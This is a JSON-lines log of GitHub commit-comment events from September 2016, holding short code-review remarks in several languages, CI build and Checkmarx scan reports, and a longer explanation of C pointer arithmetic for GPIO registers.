{"id":"4598383261","type":"CommitCommentEvent","actor":{"login":"terminalmage"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19119232,"position":null,"line":null,"path":null,"commit_id":"f237fe4d528efd621e1f9adbeb149695e94e65a1","created_at":"2016-09-21T19:24:43Z","updated_at":"2016-09-21T19:24:43Z","body":"Single quotes are already in the style guidelines: https://docs.saltstack.com/en/latest/topics/development/conventions/style.html#single-quotes\r\n\r\nThough it is not mentioned that printed strings should also use single quotes internally."}},"created_at":"2016-09-21T19:24:43Z"}
{"id":"4598383681","type":"CommitCommentEvent","actor":{"login":"Pondy9496"},"repo":{"name":"Pondy9496/exercise-repo"},"payload":{"comment":{"id":19119234,"position":1,"line":1,"path":"README.md","commit_id":"6fa8ffd16b0f25a3e2cebd3541616a8f397a8e59","created_at":"2016-09-21T19:24:48Z","updated_at":"2016-09-21T19:24:48Z","body":"# Pandy + Pony = Pondy"}},"created_at":"2016-09-21T19:24:48Z"}
{"id":"4598386106","type":"CommitCommentEvent","actor":{"login":"kasper93"},"repo":{"name":"kasper93/mpc-hc"},"payload":{"comment":{"id":19119236,"position":null,"line":null,"path":null,"commit_id":"209985cde61ed382e5ed0a929ecf6eb07decd1fe","created_at":"2016-09-21T19:25:15Z","updated_at":"2016-09-21T19:25:15Z","body":"Right. I've added \"ss\" in https://github.com/mpc-hc/mpc-hc/commit/9ee67482cb19b6f1a006beb580b27ecf2ffe57c4 and it doesn't fit. There are two solutions, either we add one more tab to every string. so it fits or just remove \"ss\" part., It is technically incorrect, but it is in description that one can use seconds too. "}},"created_at":"2016-09-21T19:25:15Z"}
{"id":"4598387433","type":"CommitCommentEvent","actor":{"login":"ftp27"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":19119242,"position":null,"line":null,"path":null,"commit_id":"18844bc65229786b96b89a9fc7739c0fc897905e","created_at":"2016-09-21T19:25:29Z","updated_at":"2016-09-21T19:25:29Z","body":"Hello, Swift"}},"created_at":"2016-09-21T19:25:29Z"}
{"id":"4598387548","type":"CommitCommentEvent","actor":{"login":"zikhik"},"repo":{"name":"zikhik/Dz1Sem3"},"payload":{"comment":{"id":19119243,"position":null,"line":null,"path":null,"commit_id":"bcb02600d450e1532de515a654d1eb559fbf9e8a","created_at":"2016-09-21T19:25:31Z","updated_at":"2016-09-21T19:25:31Z","body":"removed bags, added 'top()' , 'empty()' and exceptions safety`s comments "}},"created_at":"2016-09-21T19:25:31Z"}
{"id":"4598387706","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"classicdb/database"},"payload":{"comment":{"id":19119245,"position":null,"line":null,"path":null,"commit_id":"b631370dfcfa178a665c8732cbc9ba60932be6b4","created_at":"2016-09-21T19:25:33Z","updated_at":"2016-09-21T19:25:33Z","body":"I like EntryID :+1:"}},"created_at":"2016-09-21T19:25:33Z"}
{"id":"4598388577","type":"CommitCommentEvent","actor":{"login":"m-slattery"},"repo":{"name":"m-slattery/RichWebDevelopment"},"payload":{"comment":{"id":19119249,"position":null,"line":null,"path":null,"commit_id":"a9814ab86d601d6ca7ce8b3490f17b6126c00b73","created_at":"2016-09-21T19:25:44Z","updated_at":"2016-09-21T19:25:44Z","body":"View: https://jsbin.com/zahubi"}},"created_at":"2016-09-21T19:25:44Z"}
{"id":"4598394681","type":"CommitCommentEvent","actor":{"login":"tailsu"},"repo":{"name":"Icenium/icenium-cli"},"payload":{"comment":{"id":19119260,"position":65,"line":329,"path":"lib/services/build.ts","commit_id":"4c4bad2cc80370a97f99cc66796db1c3dfbbfc5a","created_at":"2016-09-21T19:26:54Z","updated_at":"2016-09-21T19:26:54Z","body":"C'mon mates, use the `${'new'}`` TS syntax"}},"created_at":"2016-09-21T19:26:54Z"}
{"id":"4598397227","type":"CommitCommentEvent","actor":{"login":"widhalmt"},"repo":{"name":"widhalmt/check_logstash"},"payload":{"comment":{"id":19119267,"position":3,"line":2,"path":"README.md","commit_id":"d72dd20a043f263a8b6b980f031e7ed7de8d4ef8","created_at":"2016-09-21T19:27:25Z","updated_at":"2016-09-21T19:27:25Z","body":"Jep, you're right. The API will available from Logstash 5.0 upwards. But where do you see the typo?"}},"created_at":"2016-09-21T19:27:25Z"}
{"id":"4598399531","type":"CommitCommentEvent","actor":{"login":"adamvy"},"repo":{"name":"foam-framework/foam2-experimental"},"payload":{"comment":{"id":19119272,"position":8,"line":899,"path":"src/foam/dao/dao.js","commit_id":"995aacf42cabe841bb0e2e80f772bf1aecc57d3a","created_at":"2016-09-21T19:27:54Z","updated_at":"2016-09-21T19:27:54Z","body":"Note you can do this.onDestroy(this.delegateSub_) to add it to the list of destroyables."}},"created_at":"2016-09-21T19:27:54Z"}
{"id":"4598399633","type":"CommitCommentEvent","actor":{"login":"brzuchal"},"repo":{"name":"brzuchal/design-patterns"},"payload":{"comment":{"id":19119273,"position":14,"line":14,"path":"test.php","commit_id":"2dd862c71980aa6a1314926ae2e2ec898e1aca69","created_at":"2016-09-21T19:27:55Z","updated_at":"2016-09-21T19:27:55Z","body":"This is another tricky way to instantiate additional instance which proofs there is no way to declare singleton pattern safely."}},"created_at":"2016-09-21T19:27:55Z"}
{"id":"4598400124","type":"CommitCommentEvent","actor":{"login":"PERA88050403"},"repo":{"name":"antoinepaul/antoinepaul"},"payload":{"comment":{"id":19119276,"position":null,"line":null,"path":null,"commit_id":"403bf2203e41faba7c930f75a44f6be7cb943ed2","created_at":"2016-09-21T19:28:01Z","updated_at":"2016-09-21T19:28:01Z","body":"J'ai mi un nouveaux BLOC-NOTE < Devoir> comme ça c,est les devoir qu'ont doit faire tout les deux et dans Antoine c,est que pour moi mais c,est pas grave si tu le vois c,est pas personnel."}},"created_at":"2016-09-21T19:28:01Z"}
{"id":"4598413902","type":"CommitCommentEvent","actor":{"login":"terminalmage"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19119312,"position":null,"line":null,"path":null,"commit_id":"f237fe4d528efd621e1f9adbeb149695e94e65a1","created_at":"2016-09-21T19:30:38Z","updated_at":"2016-09-21T19:30:38Z","body":"> Does making it multiple lines help with raise error pointing out the issue?\r\n\r\nYeah, the entire reason was to be able to have those values available in the different except blocks. Your way was fine, I just chose to break it up for more accurate error reporting."}},"created_at":"2016-09-21T19:30:38Z"}
{"id":"4598415897","type":"CommitCommentEvent","actor":{"login":"n1kolaa"},"repo":{"name":"Grouper-AOSP/android_kernel_asus_grouper"},"payload":{"comment":{"id":19119318,"position":5,"line":453,"path":"arch/arm/configs/grouper_defconfig","commit_id":"1266d68bb1c08667ab2875ab0a8558ae8ce85d38","created_at":"2016-09-21T19:31:02Z","updated_at":"2016-09-21T19:31:02Z","body":"No problem :+1: "}},"created_at":"2016-09-21T19:31:02Z"}
{"id":"4598416026","type":"CommitCommentEvent","actor":{"login":"pineapplemachine"},"repo":{"name":"pineapplemachine/mach.d"},"payload":{"comment":{"id":19119320,"position":null,"line":null,"path":null,"commit_id":"d35f67d7e5302e017d5654966f3f8523c656bbea","created_at":"2016-09-21T19:31:03Z","updated_at":"2016-09-21T19:31:03Z","body":"test not text"}},"created_at":"2016-09-21T19:31:03Z"}
{"id":"4598416917","type":"CommitCommentEvent","actor":{"login":"night-f-u-r-y"},"repo":{"name":"night-f-u-r-y/panndi"},"payload":{"comment":{"id":19119324,"position":null,"line":null,"path":null,"commit_id":"d42e73c2174d7fdf7a14b8a32419403d92e2d1dd","created_at":"2016-09-21T19:31:13Z","updated_at":"2016-09-21T19:31:13Z","body":"qw"}},"created_at":"2016-09-21T19:31:13Z"}
{"id":"4598417264","type":"CommitCommentEvent","actor":{"login":"PERA88050403"},"repo":{"name":"antoinepaul/antoinepaul"},"payload":{"comment":{"id":19119328,"position":null,"line":null,"path":null,"commit_id":"403bf2203e41faba7c930f75a44f6be7cb943ed2","created_at":"2016-09-21T19:31:17Z","updated_at":"2016-09-21T19:31:17Z","body":"Ne clic jamais sur <lock conversation> il faudra refaire notre organisation, au dessus de la première bulle."}},"created_at":"2016-09-21T19:31:17Z"}
{"id":"4598418349","type":"CommitCommentEvent","actor":{"login":"Wuyue54"},"repo":{"name":"fever324/ExpressBackend"},"payload":{"comment":{"id":19119333,"position":null,"line":null,"path":null,"commit_id":"7dbcc5005b527b22a66d3a97a08d17b62ddd2e23","created_at":"2016-09-21T19:31:29Z","updated_at":"2016-09-21T19:31:29Z","body":"'let' 和 ‘var’ 不要混着用嘛\r\n"}},"created_at":"2016-09-21T19:31:29Z"}
{"id":"4598420347","type":"CommitCommentEvent","actor":{"login":"omgmakeme"},"repo":{"name":"samanthag21/phase-0-tracks"},"payload":{"comment":{"id":19119340,"position":null,"line":null,"path":null,"commit_id":"5a24a9afab58fd939b02275c9d5820c58c0be7ed","created_at":"2016-09-21T19:31:51Z","updated_at":"2016-09-21T19:31:51Z","body":":shipit: "}},"created_at":"2016-09-21T19:31:51Z"}
{"id":"4598420515","type":"CommitCommentEvent","actor":{"login":"vanfstd"},"repo":{"name":"ioannad/experiments"},"payload":{"comment":{"id":19119342,"position":53,"line":56,"path":"rpiOS/K9OS/k9os.c","commit_id":"dab4692eedcefd23f5acb07591d03878ce776c42","created_at":"2016-09-21T19:31:53Z","updated_at":"2016-09-21T19:31:53Z","body":"Three things first (apologies if they aren't news, but maybe they are):\r\n\r\n1. If you use the name of an array in an expression(*), it is implicitly converted to a pointer to the first element of the array.  This is why it is okay to do `int arr[42];  int *ptr = arr;` with no type conflict.  This is syntactic sugar and behind the scenes, it really is `int *ptr = &arr[0]`. (The type of `arr[0]` is `int`, getting a pointer to it (`&`) gives you `int *`, i.e. a pointer to an `int`.\r\n\r\n2. If you add an integer to a pointer, that's called \"pointer arithmetic\" and if we assume for a moment that pointers are just integers (in practice they often are, but they need not be (think segmented memory)), then `ptr + 42` adds `42 * sizeof *ptr`, i.e. 42 times the size of the pointed-to type, to the pointer.  In other words if `ptr` points to the first element of an array, `ptr + 42` points to the 42th element, regardless of how big each array element is. \r\n\r\n3. An expression of the form `foo[bar]` is nothing but syntactic sugar for `*(foo + bar)` (i.e. do pointer arithmetic on foo (which, if it is an array, is treated as a pointer here due to (1.)).  Don't however be tricked into believing the widespread \"arrays are pointers\" mis-wisdom that's both wrong and a huge source of confusion.\r\n\r\nCorollary from 3.)  since `+` is commutative, `\"hello\"[4]` and `4[\"hello\"]` are exactly the same and will both give you `'o'`.  Not that there's a reason for doing the latter outside the IOCCC...\r\n\r\nSo with this in mind, let's see what's happening\r\n\r\n> `#define GPIO_BASE  0x20200000UL`\r\n\r\n`GPIO_BASE` is an integer, precisely an integer of type `unsigned long` thanks to the UL-suffix.  This will just be the physical address in memory where the control registers (there's likely one for each port or even pin) for the GPIO begin.\r\n\r\n> `unsigned int *gpio = (unsigned int *)GPIO_BASE;` (the `volatile` is irrelevant here)\r\n\r\nWe're breaking the rules of standard C here. Normally it's not well-defined what happens if you typecast an integer type to a pointer type, but we're hardware-specific enough to know that the address space of the device is flat, so we get away with it.  The value of `gpio` is now the memory address `GPIO_BASE`.  We could dereference it, `*gpio` or equivalently `gpio[0]` (see (2.)), to read or write an int-sized piece of data at that address in memory, or the next int-sized piece of data after that with `gpio[1]`, etc -- which is basically what happens next\r\n\r\n> gpio[LED_GPFSEL] |= (1 << LED_GPFBIT);\r\n\r\nDue to rule (3.) above, `gpio[LED_GPFSEL]` really is `*(gpio + LED_GPFSEL)`.  Assuming `LED_GPFSEL` happens to be `4`, that in fact really is the same as your `led_prep` and which one would be more appropriate to use is just a matter of communicating intent, or even personal taste.  But: subscripting an array keeps it a bit more flexible, since the decision which GPIO pin you're manipulating can be made at runtime.  Stupid example: you could prompt the user to tell you a number `n`, and then deal with `gpio[n]`.   You can't really (apart from an if-else cascade that knows all GPIOs in advance) do that if you prefer to have a separate variable for each GPIO.\r\n\r\nI hope that was somewhat understandable, please let me know if it needs clarification.\r\n\r\n(*) Bit of a simplification but close enough for now. (Notable exceptions: no such conversion if the array is operand to the `&` and the `sizeof` operators. I can elaborate on this in person if need be, it's not as twisted as it sounds here.\r\n\r\nPS:\r\n> well they are just treating the pointer as an pointer to an array\r\n\r\nThey're treating an integer as a pointer *into* an array. The distinction to/into sounds like nitpicking, but only until you realize there are actually pointers *to* (whole) arrays:\r\n\r\n`int arr[42];  // an array.`\r\n`int *ptr = arr; // a pointer *into* arr`\r\n`int (*ptr)[42] = &arr; // pointer *to* arr`\r\n\r\nThe latter thing is rare stuff, I think I needed it exactly [once](https://github.com/fstd/libsrsirc/blob/devel/libsrsirc/irc_getset.c#L105) in my life so far.\r\n\r\nCheers, HTH"}},"created_at":"2016-09-21T19:31:53Z"}
{"id":"4598420573","type":"CommitCommentEvent","actor":{"login":"Wndrr"},"repo":{"name":"Wndrr/Ponteilla"},"payload":{"comment":{"id":19119343,"position":null,"line":null,"path":null,"commit_id":"ca203147deb88e11b04ff04991c168e0cf36dc21","created_at":"2016-09-21T19:31:53Z","updated_at":"2016-09-21T19:31:53Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;sSICsoBN&#x2F;56-remove-subscription-file\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Remove subscription file</a>"}},"created_at":"2016-09-21T19:31:53Z"}
{"id":"4598422499","type":"CommitCommentEvent","actor":{"login":"jdiemke"},"repo":{"name":"IncarVishnu/platformer"},"payload":{"comment":{"id":19119347,"position":null,"line":null,"path":null,"commit_id":"d7e3b7affbe296db932b24d92cd4ceef7a588069","created_at":"2016-09-21T19:32:14Z","updated_at":"2016-09-21T19:32:14Z","body":"Hi,\r\n\r\nein kurzes Feedback von mir:\r\n\r\n* Ich finde es sollte Abstand von der Konstanten-Schreibweise für nicht Konstanten und Objekte genommen werden, da es sich dabei um einen quasi Standard handelt.\r\n\r\n* Die Trennung des Levels in eine JSON-Datei finde ich sehr gut. Das Level-Format empfinde ich allerdings als sehr \"bloated\" und durch die verwendete Formatierung nur schwer lesbar.\r\n\r\nVG\r\nJohannes"}},"created_at":"2016-09-21T19:32:14Z"}
{"id":"4598427817","type":"CommitCommentEvent","actor":{"login":"jacksonic"},"repo":{"name":"foam-framework/foam2-experimental"},"payload":{"comment":{"id":19119360,"position":8,"line":899,"path":"src/foam/dao/dao.js","commit_id":"995aacf42cabe841bb0e2e80f772bf1aecc57d3a","created_at":"2016-09-21T19:33:15Z","updated_at":"2016-09-21T19:33:15Z","body":"In this case it's a destructor that destroys whatever the current one\nhappens to be, in case of a delegate swap where the subscription is\ndestroyed and replaced. Though if the number of delegate swaps is expected\nto be small, piling up a new destroyable for each swap may be easier.\n\nOn Wed, Sep 21, 2016 at 3:27 PM adamvy <notifications@github.com> wrote:\n\n> Note you can do this.onDestroy(this.delegateSub_) to add it to the list of\n> destroyables.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/foam-framework/foam2-experimental/commit/995aacf42cabe841bb0e2e80f772bf1aecc57d3a#commitcomment-19119272>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIKjMKd1EtlNujrbtOHrTGE5CkB3OPG6ks5qsYU6gaJpZM4KDL6G>\n> .\n>\n"}},"created_at":"2016-09-21T19:33:15Z"}
{"id":"4598430644","type":"CommitCommentEvent","actor":{"login":"terminalmage"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19119361,"position":null,"line":null,"path":null,"commit_id":"f237fe4d528efd621e1f9adbeb149695e94e65a1","created_at":"2016-09-21T19:33:46Z","updated_at":"2016-09-21T19:33:46Z","body":"> Is the import copy still needed in states/pkg.py\r\n\r\nNope. I haven't linted this yet, this would have been caught eventually, but good to have it caught ahead of time. I've removed it in this branch."}},"created_at":"2016-09-21T19:33:46Z"}
{"id":"4598432955","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19119367,"position":null,"line":null,"path":null,"commit_id":"6ac19ea356df9fa833c65a19322ea952816ecb6f","created_at":"2016-09-21T19:34:12Z","updated_at":"2016-09-21T19:34:12Z","body":"EMS (brianlball) - Win64-Windows-7-VisualStudio-12: OK (2322 of 2480 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6ac19ea356df9fa833c65a19322ea952816ecb6f-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6ac19ea356df9fa833c65a19322ea952816ecb6f-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.63%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T19:34:12Z"}
{"id":"4598435950","type":"CommitCommentEvent","actor":{"login":"jacksonic"},"repo":{"name":"foam-framework/foam2-experimental"},"payload":{"comment":{"id":19119371,"position":8,"line":899,"path":"src/foam/dao/dao.js","commit_id":"995aacf42cabe841bb0e2e80f772bf1aecc57d3a","created_at":"2016-09-21T19:34:45Z","updated_at":"2016-09-21T19:34:45Z","body":"Or perhaps this.onDestroy(this.delegateSub_$) for the slot...\n\nOn Wed, Sep 21, 2016 at 3:32 PM Jackson Stone <jacksonic@google.com> wrote:\n\n> In this case it's a destructor that destroys whatever the current one\n> happens to be, in case of a delegate swap where the subscription is\n> destroyed and replaced. Though if the number of delegate swaps is expected\n> to be small, piling up a new destroyable for each swap may be easier.\n>\n> On Wed, Sep 21, 2016 at 3:27 PM adamvy <notifications@github.com> wrote:\n>\n> Note you can do this.onDestroy(this.delegateSub_) to add it to the list of\n> destroyables.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/foam-framework/foam2-experimental/commit/995aacf42cabe841bb0e2e80f772bf1aecc57d3a#commitcomment-19119272>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIKjMKd1EtlNujrbtOHrTGE5CkB3OPG6ks5qsYU6gaJpZM4KDL6G>\n> .\n>\n>\n"}},"created_at":"2016-09-21T19:34:45Z"}
{"id":"4598441214","type":"CommitCommentEvent","actor":{"login":"psykokwak4"},"repo":{"name":"manradhaCisco/ydk-gen"},"payload":{"comment":{"id":19119387,"position":9,"line":182,"path":"sdk/cpp/tests/bgpnctest.cpp","commit_id":"eba5062ed847b510f15f4e7d49f2c8f63a35f209","created_at":"2016-09-21T19:35:41Z","updated_at":"2016-09-21T19:35:41Z","body":"Are we going to change the ConfD netconf port to 2022? "}},"created_at":"2016-09-21T19:35:41Z"}
{"id":"4598442333","type":"CommitCommentEvent","actor":{"login":"forno"},"repo":{"name":"CIR-KIT/fifth_robot_pkg"},"payload":{"comment":{"id":19119389,"position":null,"line":null,"path":null,"commit_id":"7dce8e765b332a6e4020cca33338dd7715d9a03f","created_at":"2016-09-21T19:35:54Z","updated_at":"2016-09-21T19:35:54Z","body":"大分前のSubmodule変更したと思ってやった奴が誤ってたので修正もかねてブランチ指定も行っておいた。"}},"created_at":"2016-09-21T19:35:54Z"}
{"id":"4598447431","type":"CommitCommentEvent","actor":{"login":"TJScalzo"},"repo":{"name":"team178/hofc"},"payload":{"comment":{"id":19119408,"position":null,"line":null,"path":null,"commit_id":"b25176673e179de491f512edbcf206711919954d","created_at":"2016-09-21T19:36:52Z","updated_at":"2016-09-21T19:36:52Z","body":"Oh well, it didn't work."}},"created_at":"2016-09-21T19:36:52Z"}
{"id":"4598448551","type":"CommitCommentEvent","actor":{"login":"abhikeshav"},"repo":{"name":"manradhaCisco/ydk-gen"},"payload":{"comment":{"id":19119409,"position":9,"line":182,"path":"sdk/cpp/tests/bgpnctest.cpp","commit_id":"eba5062ed847b510f15f4e7d49f2c8f63a35f209","created_at":"2016-09-21T19:37:06Z","updated_at":"2016-09-21T19:37:06Z","body":"No. Just need to modify confd.conf to have port 12022 so that these lines don't have to change."}},"created_at":"2016-09-21T19:37:06Z"}
{"id":"4598462290","type":"CommitCommentEvent","actor":{"login":"IncarVishnu"},"repo":{"name":"IncarVishnu/platformer"},"payload":{"comment":{"id":19119433,"position":null,"line":null,"path":null,"commit_id":"d7e3b7affbe296db932b24d92cd4ceef7a588069","created_at":"2016-09-21T19:39:40Z","updated_at":"2016-09-21T19:39:40Z","body":"Hi,\r\n\r\nkann ich gerne wieder ändern mit der Schreibweise. Hatte die gewählt, weil ich dachte, das so klarer wird, das es sich um \"config\" Variablen handelt. Würdest du die dann einfach normal benennen (z.B. \"world\") oder entsprechend \"markieren\" (z.B. \"$world\")?\r\n\r\nMit dem zweiten Punkt hast du recht. Die Schreibweise ist auch nur temporär, bis ich den Editor fertig habe. Die Idee ist, das die JSON später sowohl die einzelnen Konfigurationen für die Tiles, als auch das Level-Design enthält. Die voll ausgeschriebenen Namen der Tiles sollen dann IDs werden, damit das JSON so schlank wie möglich bleibt/wird.\r\n\r\nDanke für dein Feedback :-)\r\n\r\nVG Daniel"}},"created_at":"2016-09-21T19:39:40Z"}
{"id":"4598464450","type":"CommitCommentEvent","actor":{"login":"a1rwulf"},"repo":{"name":"kodi-game/game.libretro"},"payload":{"comment":{"id":19119443,"position":5,"line":8,"path":"game.libretro/addon.xml.in","commit_id":"b9603eb1e3eb98ca917280ea23ad3ec13f1c9e6a","created_at":"2016-09-21T19:40:06Z","updated_at":"2016-09-21T19:40:06Z","body":"It's not really about a missing version bump.\r\nIt's about a lost symbol:\r\n1) https://github.com/a1rwulf/xbmc/blob/retroplayer-17alpha1-gl/xbmc/addons/kodi-addon-dev-kit/include/kodi/kodi_game_types.h\r\n2) https://github.com/a1rwulf/xbmc/blob/1993b789bc1f61475f0efc3c7bd5fa379e16054f/xbmc/addons/kodi-addon-dev-kit/include/kodi/kodi_game_types.h\r\n\r\nIf you diff 1 and 2 you see that in the original version GAME_VIDEO_ROTATION is missing, but was bumped to v25.\r\nNobody uses it right now (besides me), but we should not forget to handle it."}},"created_at":"2016-09-21T19:40:06Z"}
{"id":"4598469935","type":"CommitCommentEvent","actor":{"login":"drequil"},"repo":{"name":"drequil/Bookstore_ASPX"},"payload":{"comment":{"id":19119460,"position":null,"line":null,"path":null,"commit_id":"2be62c1877e40c10d5fd91bbbb07371191c4db13","created_at":"2016-09-21T19:41:11Z","updated_at":"2016-09-21T19:41:11Z","body":"Checkmarx scan results 21 Sep 2016 19:39 UTC +00:00\r\n<table>\r\n<thead>\r\n<tr>\r\n<th></th>\r\n<th>High</th>\r\n<th>Medium</th>\r\n<th>Low</th>\r\n<th>Info</th>\r\n</tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td><b>New</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Recurrent</b></td>\r\n<td align=\"center\">82</td>\r\n<td align=\"center\">146</td>\r\n<td align=\"center\">94</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Fixed</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href= \"https://cxprivatecloud.checkmarx.net/CxWebClient/ViewerMain.aspx?scanid=1003186&projectid=1378\"> Open Viewer</a>\r\n<b>Included commits</b><table><tr><th>Commit ID</th><th>Owner</th></tr><tr><td><a href=\"https://github.com/drequil/Bookstore_ASPX/commit/2be62c1877e40c10d5fd91bbbb07371191c4db13\">2be62c1877e40c10d5fd91bbbb07371191c4db13</a></td><td>@drequil</td></tr></table>\r\n"}},"created_at":"2016-09-21T19:41:11Z"}
{"id":"4598470220","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19119462,"position":null,"line":null,"path":null,"commit_id":"b406d386ac7aedbef93bace2a3daca2aa7064487","created_at":"2016-09-21T19:41:14Z","updated_at":"2016-09-21T19:41:14Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/525/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=WW-329)."}},"created_at":"2016-09-21T19:41:14Z"}
{"id":"4598471772","type":"CommitCommentEvent","actor":{"login":"jhudsonWA"},"repo":{"name":"ZipArchive/ZipArchive"},"payload":{"comment":{"id":19119467,"position":null,"line":null,"path":null,"commit_id":"d1e5f47e29da8fd661237718316d40519c9f9a00","created_at":"2016-09-21T19:41:32Z","updated_at":"2016-09-21T19:41:32Z","body":"So is there a problem or not? All of the included project tests are passing."}},"created_at":"2016-09-21T19:41:32Z"}
{"id":"4598472203","type":"CommitCommentEvent","actor":{"login":"psykokwak4"},"repo":{"name":"manradhaCisco/ydk-gen"},"payload":{"comment":{"id":19119469,"position":9,"line":182,"path":"sdk/cpp/tests/bgpnctest.cpp","commit_id":"eba5062ed847b510f15f4e7d49f2c8f63a35f209","created_at":"2016-09-21T19:41:36Z","updated_at":"2016-09-21T19:41:36Z","body":"Test scripts in Python used port 12022, do we need to change them to 2022? Or we are going to use different ConfD sessions?"}},"created_at":"2016-09-21T19:41:36Z"}
{"id":"4598474648","type":"CommitCommentEvent","actor":{"login":"philipcristiano"},"repo":{"name":"lizmintzias/resume"},"payload":{"comment":{"id":19119484,"position":null,"line":null,"path":null,"commit_id":"a7e8133db93474947b3779f4d9825c91c9f55f21","created_at":"2016-09-21T19:42:03Z","updated_at":"2016-09-21T19:42:03Z","body":"Hi Elizabeth, this was a fantastic way to try and reach me, although I wasn't notified by the fork. If you try this approach in the future you should make a pull request and @ include the person to notify them. "}},"created_at":"2016-09-21T19:42:03Z"}
{"id":"4598475023","type":"CommitCommentEvent","actor":{"login":"pitu7dg"},"repo":{"name":"mdlugosz1/kodilla-javascript"},"payload":{"comment":{"id":19119486,"position":11,"line":8,"path":"js/scripts.js","commit_id":"d813a9bd225fbc388fb0c3acc5cfcf75c1d1e5fd","created_at":"2016-09-21T19:42:08Z","updated_at":"2016-09-21T19:42:08Z","body":"Oddziel zmienne przecinkiem.\r\n\r\nZmienne, zawsze powinny być zadeklarowane słówkiem `var`\r\n```\r\nvar a = 10;\r\nvar b = 20;\r\n```\r\nlub\r\n```\r\nvar a = 10,\r\n    b = 20;\r\n```\r\n\r\nKiedy nie ma słówka var, to zawsze tworzona jest zmienna globalna, a to jest niebezpieczne :)"}},"created_at":"2016-09-21T19:42:08Z"}
{"id":"4598476893","type":"CommitCommentEvent","actor":{"login":"abhikeshav"},"repo":{"name":"manradhaCisco/ydk-gen"},"payload":{"comment":{"id":19119489,"position":9,"line":182,"path":"sdk/cpp/tests/bgpnctest.cpp","commit_id":"eba5062ed847b510f15f4e7d49f2c8f63a35f209","created_at":"2016-09-21T19:42:28Z","updated_at":"2016-09-21T19:42:28Z","body":"No. We can change C++ tests to use 12022"}},"created_at":"2016-09-21T19:42:28Z"}
{"id":"4598480813","type":"CommitCommentEvent","actor":{"login":"Stormican"},"repo":{"name":"Stormican/b4-java"},"payload":{"comment":{"id":19119501,"position":83,"line":83,"path":"TheStartOfItAll.java","commit_id":"4679399370d1705718064275cd2e0748610311e3","created_at":"2016-09-21T19:43:13Z","updated_at":"2016-09-21T19:43:13Z","body":"What?\r\n"}},"created_at":"2016-09-21T19:43:13Z"}
{"id":"4598481383","type":"CommitCommentEvent","actor":{"login":"mgaudet"},"repo":{"name":"noryb009/omr"},"payload":{"comment":{"id":19119502,"position":null,"line":null,"path":null,"commit_id":"0fc27503260eb0f90152d746407e6eaa1cc86643","created_at":"2016-09-21T19:43:20Z","updated_at":"2016-09-21T19:43:20Z","body":"Looks pretty good -- though, I think the effort should be put into removing TRSRC not the JIT_SRCBASE and JIT_OBJBASE :) "}},"created_at":"2016-09-21T19:43:20Z"}
{"id":"4598482256","type":"CommitCommentEvent","actor":{"login":"hwuerz"},"repo":{"name":"hwuerz/jpa-example"},"payload":{"comment":{"id":19119504,"position":14,"line":14,"path":"src/main/java/de/hwuerz/example/hibernate/Controller.java","commit_id":"adbbef29151fa4399feebf491949cc70bbe245e8","created_at":"2016-09-21T19:43:29Z","updated_at":"2016-09-21T19:43:29Z","body":"Hallo Albert, vielen Dank für den Hinweis. Das habe ich gleich eingebaut. Wie kommt es, dass du das hier gefunden hast? :) Viele Grüße, Hendrik"}},"created_at":"2016-09-21T19:43:29Z"}
{"id":"4598489408","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19119521,"position":null,"line":null,"path":null,"commit_id":"c58ea292f10f671d6fc33e7484f510e29c8aa075","created_at":"2016-09-21T19:44:49Z","updated_at":"2016-09-21T19:44:49Z","body":"iteration (evanweaver) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2361 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c58ea292f10f671d6fc33e7484f510e29c8aa075-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c58ea292f10f671d6fc33e7484f510e29c8aa075-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-96.45%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T19:44:49Z"}
